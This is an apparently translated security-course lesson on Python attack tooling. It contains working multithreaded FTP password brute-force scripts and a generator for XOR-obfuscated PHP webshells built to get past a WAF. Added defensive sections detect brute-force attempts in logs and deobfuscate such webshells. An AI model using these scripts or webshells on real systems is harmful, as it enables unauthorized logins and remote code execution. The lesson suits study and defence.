78: Python Development - Multithreaded Fuzzing, WAF XOR Evasion and Brute Forcing


Topics covered in this lesson:
  • Using protocol modules, the Requests crawler technique, simple multithreading, encoding techniques and backdoor bypass techniques
Learning objectives:
  • Learn to use these powerful modules to implement connection operations over various protocols (brute forcing, exploitation and so on), and to combine them with fuzzing to get past a WAF
Case 1: Implementing simple multithreading in a script
  • Using the queue and threading modules

Case 2: Using the FTP module to implement a protocol brute-force script

  • 1. Using the ftplib module
  • 2. Iterating over the username and password dictionaries
  • 3. Attempting to connect and executing a command to verify the login
# Author:Serena

import ftplib

# Simple simulated login test
# Brute force: IP, port, username and password dictionaries

def ftp_brute():
    ftp = ftplib.FTP()

    with open('ftp-user.txt') as userfile:
        for username in userfile:
            username = username.rstrip('\r\n')
            with open('ftp-pwd.txt') as passfile:
                for password in passfile:
                    password = password.rstrip('\r\n')
                    # print(username+'|'+password)
                    try:
                        ftp.connect('192.168.56.110', 21)
                        ftp.login(username, password)
                        print(username + '|' + password + '| ok')
                        # retrlines('LIST') prints the listing of the current FTP directory
                        # to stdout and returns the server's final response line
                        resp = ftp.retrlines('LIST')
                        print(resp)
                        ftp.quit()
                    except ftplib.all_errors:
                        pass
                    finally:
                        ftp.close()   # release the socket before the next connect()

if __name__ == '__main__':
    ftp_brute()
ftp_brute_single-threaded
# Author:Serena

import ftplib
import queue
import sys
import threading

# Simple simulated login test
# Brute force: IP, port, username and password dictionaries

def ftp_brute(ip, port):
    ftp = ftplib.FTP()
    ftp.connect(ip, port)
    while True:
        try:
            # get_nowait() avoids the race in "while not q.empty(): q.get()", where a
            # second thread sees the last item and then blocks forever on an empty queue
            item = q.get_nowait()
        except queue.Empty:
            break
        username, password = item.split('|', 1)
        try:
            ftp.login(username, password)
            print(username + '|' + password + '| ok')
            # retrlines('LIST') prints the listing of the current FTP directory
            # to stdout and returns the server's final response line
            resp = ftp.retrlines('LIST')
            print(resp)
        except ftplib.all_errors:
            print(username + '|' + password + '| no')
    ftp.close()

if __name__ == '__main__':
    ip = sys.argv[1]
    port = int(sys.argv[2])
    userfile = sys.argv[3]
    passfile = sys.argv[4]
    threading_num = int(sys.argv[5])
    q = queue.Queue()
    with open(userfile) as uf:
        for username in uf:
            username = username.rstrip('\r\n')
            with open(passfile) as pf:
                for password in pf:
                    password = password.rstrip('\r\n')
                    # print(username+'|'+password)
                    q.put(username + '|' + password)

    for x in range(threading_num):
        t = threading.Thread(target=ftp_brute, args=(ip, port))
        t.start()

# Run from the command line: python3 test.py 192.168.56.110 21 ftp-user.txt ftp-pwd.txt 10
# Possible improvement: stop once the correct username/password has been found
ftp_brute_multithreaded
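The queue/threading pattern of Cases 1 and 2, seen from the other side of the connection. This is an added example, not code from the original lesson: it fans vsftpd-style log lines out to worker threads and counts failed logins per source address, which is exactly the trace the multithreaded brute-force script above leaves on the server. The log lines are constructed (modelled on vsftpd's 'FAIL LOGIN: Client "..."' format, not a real capture), the threshold of 5 failures is an arbitrary assumption, and the function names are mine.

```python
import collections
import queue
import re
import threading

# Constructed sample, modelled on vsftpd's log line format (not a real capture).
SAMPLE_LOG = """\
Tue Sep  3 12:00:01 2024 [pid 2] CONNECT: Client "192.168.56.1"
Tue Sep  3 12:00:01 2024 [pid 2] [ftp] FAIL LOGIN: Client "192.168.56.1"
Tue Sep  3 12:00:02 2024 [pid 2] [ftp] FAIL LOGIN: Client "192.168.56.1"
Tue Sep  3 12:00:02 2024 [pid 2] [admin] FAIL LOGIN: Client "192.168.56.1"
Tue Sep  3 12:00:03 2024 [pid 2] [admin] FAIL LOGIN: Client "192.168.56.1"
Tue Sep  3 12:00:03 2024 [pid 2] [ftp] FAIL LOGIN: Client "192.168.56.1"
Tue Sep  3 12:00:04 2024 [pid 2] [ftp] FAIL LOGIN: Client "192.168.56.1"
Tue Sep  3 12:00:04 2024 [pid 2] [ftp] OK LOGIN: Client "192.168.56.1"
Tue Sep  3 12:05:10 2024 [pid 3] [alice] FAIL LOGIN: Client "10.0.0.5"
Tue Sep  3 12:05:12 2024 [pid 3] [alice] OK LOGIN: Client "10.0.0.5"
""".splitlines()

LOGIN_RE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse_login(line):
    """Return (ip, user, result) for a login line, or None for any other line."""
    m = LOGIN_RE.search(line)
    if m is None:
        return None
    return m.group("ip"), m.group("user"), m.group("result")


def analyze(lines, threshold=5, workers=4):
    """Fan the log lines out to worker threads and aggregate per-source counters.

    Returns {ip: {"failures": n, "users": [...], "success": bool, "suspicious": bool}}
    for every source that attempted a login. "suspicious" means the source produced
    at least `threshold` failed logins (the brute-force signature); "success" together
    with "suspicious" means a guess eventually worked and the account needs attention.
    """
    q = queue.Queue()
    for line in lines:
        q.put(line)

    lock = threading.Lock()
    failures = collections.Counter()
    successes = set()
    users = collections.defaultdict(set)

    def worker():
        while True:
            try:
                line = q.get_nowait()   # never blocks: no "empty() then get()" race
            except queue.Empty:
                return
            parsed = parse_login(line)
            if parsed is None:
                continue
            ip, user, result = parsed
            with lock:                  # Counter/set updates are not atomic
                users[ip].add(user)
                if result == "FAIL":
                    failures[ip] += 1
                else:
                    successes.add(ip)

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

    report = {}
    for ip in users:
        n = failures[ip]
        report[ip] = {
            "failures": n,
            "users": sorted(users[ip]),
            "success": ip in successes,
            "suspicious": n >= threshold,
        }
    return report


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        flag = "ALERT" if info["suspicious"] else "ok"
        print(f'{ip}: {info["failures"]} failed logins over users {info["users"]}, '
              f'success={info["success"]} -> {flag}')
```

Two details differ from the lesson's scripts on purpose. Workers call get_nowait() and catch queue.Empty instead of testing q.empty() before q.get(): with the latter, two threads can both see one remaining item, and the one that loses the race blocks forever. And every update to the shared counters is done under a lock, because a Counter increment is a read-modify-write that the GIL does not make atomic.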

Case 3: Combining fuzzing with an XOR-evasion shell script

  • 1. Explanation of the XOR-evasion shell principle and the development approach (reference examples: !^@, "^? and so on)
  • 2. Generating a large number of payload variants following the fuzzing idea, naming them in order and writing them into files under the website
  • 3. Using multithreading to request every shell file in batch and submit a test to check whether it connects and echoes back normally
# Author:Serena
import queue
import threading
import time

import requests

def bypass_check():
    while True:
        try:
            filename = q.get_nowait()   # avoids the "empty() then get()" race between threads
        except queue.Empty:
            return
        url = "http://127.0.0.1:8081/x/" + filename
        datas = {
            'x': 'phpinfo();'    # the key must be exactly "x" to match $_POST[x] in the generated file
        }
        result = requests.post(url, data=datas, timeout=10).content.decode('utf-8', errors='replace')
        if "XIAODI-PC" in result:
            print('check ->' + filename + '->ok')
        else:
            print('check ->' + filename + '->no')
        time.sleep(1)

if __name__ == '__main__':
    q = queue.Queue()
    for i in range(1, 127):
        for ii in range(1, 127):
            payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"
            code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
            filename = str(i) + 'xd' + str(ii) + '.php'
            q.put(filename)
            # 'w' rather than 'a+', so a re-run overwrites the file instead of appending a second copy
            with open('D:/phpstudy/WWW/x/' + filename, 'w') as f:
                f.write(code)
                print("Fuzz file generated successfully")
    for x in range(20):
        t = threading.Thread(target=bypass_check)
        t.start()
Bypass
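Case 3 seen from the defender's side, as an added example that is not part of the original lesson. The trick relies on PHP applying the bitwise XOR of two one-character strings character by character: '!'^'@' is chr(0x21 ^ 0x40) = 'a', so ('!'^'@').'ssert' evaluates to 'assert'. A static scanner can undo that layer. The script below resolves each 'c1'^'c2' pair, folds the resulting string concatenation, and reports any variable that is assigned a dangerous function name and later invoked as $var(...). The two PHP samples are constructed from the pattern the lesson's generator emits; the DANGEROUS set and all function names are my assumptions, and only the one-character-literal form is handled (escaped characters, double-quoted strings and multi-byte strings are not).

```python
import re

# Function names that, when reached through an obfuscated variable call, are the usual
# hallmark of a one-liner webshell (assumed list, extend as needed).
DANGEROUS = {"assert", "eval", "system", "passthru", "exec", "shell_exec",
             "popen", "proc_open", "create_function"}

# Constructed samples: the first follows the lesson's generated pattern, the second is benign.
SAMPLES = {
    "xor_shell": "<?php $a=('!'^'@').'ssert';$a($_POST[x]);?>",
    "benign": "<?php $mask = 0x1 ^ 0x4; $s = 'hello'.' '.'world'; echo $s;",
}

XOR_PAIR = re.compile(r"'([^'\\])'\s*\^\s*'([^'\\])'")          # 'c1' ^ 'c2'
PAREN_LIT = re.compile(r"(?<![\w)\]])\(\s*('[^']*')\s*\)")     # ('lit') that is not a call
CONCAT = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")             # 'a' . 'b'
VAR_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'(\w+)'")               # $v = 'name'


def resolve_xor(src):
    """Replace every 'c1'^'c2' pair of one-character literals with the literal
    character PHP would produce (peels one layer of the obfuscation)."""
    def fold(m):
        ch = chr(ord(m.group(1)) ^ ord(m.group(2)))
        if not ch.isprintable() or ch in "'\\":
            ch = "\\x%02x" % ord(ch)    # keep the rewritten literal well-formed
        return "'" + ch + "'"
    return XOR_PAIR.sub(fold, src)


def fold_concat(src):
    """Collapse ('a').'ssert' style concatenations of literals into one literal."""
    prev = None
    while prev != src:                  # repeat until nothing changes
        prev = src
        src = PAREN_LIT.sub(r"\1", src)
        src = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
    return src


def deobfuscate(src):
    """Static rewrite of the source with XOR pairs resolved and literals folded."""
    return fold_concat(resolve_xor(src))


def find_dynamic_calls(src):
    """Return (variable, function_name) pairs where a variable is assigned a dangerous
    function name and later used as $var(...)."""
    plain = deobfuscate(src)
    hits = []
    for var, name in VAR_ASSIGN.findall(plain):
        if name in DANGEROUS and re.search(r"\$" + re.escape(var) + r"\s*\(", plain):
            hits.append((var, name))
    return hits


if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(label, "->", deobfuscate(src))
        print("   dynamic calls:", find_dynamic_calls(src) or "none")
```

The scanner is a heuristic, not a PHP parser: it only folds the exact shape the generator in Case 3 produces, so a file that spreads the XOR across several statements, or uses the "^? example from the lesson, whose result is the non-printable chr(0x1d), shows up as a '\x1d' literal rather than a name. The value of the exercise is that the resolved function name, not the obfuscated bytes, is what a signature should be written against.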

Related resources:

  • fuzzdb (https://github.com/zhanye/fuzzdb)
  • fuzzDicts (https://github.com/stemmm/fuzzDicts)
  • Webshell evasion and WAF bypass (https://www.cnblogs.com/liujizhou/p/11806497.html)
  • Python ftplib module (https://www.cnblogs.com/kaituorensheng/p/4480512.html)
  • PHP XOR (https://blog.csdn.net/qq_41617034/article/details/104441032)
  • https://pan.baidu.com/s/13y3U6jX3WUYmnfKnXT8abQ, extraction code: xiao